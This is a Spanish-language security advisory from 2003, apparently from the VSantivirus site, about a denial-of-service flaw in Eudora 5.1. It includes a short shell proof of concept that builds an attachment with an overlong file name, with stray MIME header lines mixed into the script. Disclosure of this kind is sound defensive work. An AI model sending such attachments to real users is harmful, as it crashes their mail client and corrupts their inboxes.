Esta página es un servicio gratuito de Video Soft BBS - SUBSCRIBASE en nuestras listas de correo.

Busque su tema:

VSantivirus  Internet
Proporcionado por FreeFind

Video Soft BBS
Menú Principal
Anti Trojans
Antivirus
Hoaxes
Subscripciones
Otro software
Artículos
Links
Sugerencias
Sobre el BBS
Direcciones
Galería
Chat

Controlado desde el
19/10/97 por NedStat
Denegación de servicio en Eudora 5.1
 
VSantivirus No. 976 - Año 7 - Lunes 10 de marzo de 2003

 Denegación de servicio en Eudora 5.1
http://www.vsantivirus.com/vul-eudora-adjuntos.htm

Por David Fernández Madrid
idoru@videosoft.net.uy

Asunto: Denegación de servicio en Eudora 5.1
Versiones afectadas: 5.1 y más antiguas
Versiones inmunes: 5.2

Descripción:

Eudora es un cliente de correo distribuido y producido por QUALCOMM. Se ha descubierto un fallo en su código que permite cerrar Eudora con una violación de acceso mediante la recepción de uno o varios e-mails con un fichero adjunto con un nombre excepcionalmente largo. No se sobrescribe el puntero de instrucción EIP, por lo que no se puede ejecutar código , pero el / los mensajes corromperán la bandeja de entrada provocando una violación de acceso cada vez que se abra Eudora.

El script que se adjunta permite crear un archivo que mandado una o varias veces a un cliente Eudora provocará el fallo.

$ set a=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAA

$ echo "exploit" >! $a.txt ------=_20030309225140_10193
Content-Type: text/plain; name="drweb.txt"
Content-Disposition: attachment; filename="drweb.txt"

Solución sugerida: Actualizar el software a la versión 5.2 o superior.



(c) Video Soft - http://www.videosoft.net.uy
(c) VSAntivirus - http://www.vsantivirus.com

 

Copyright 1996-2003 Video Soft BBS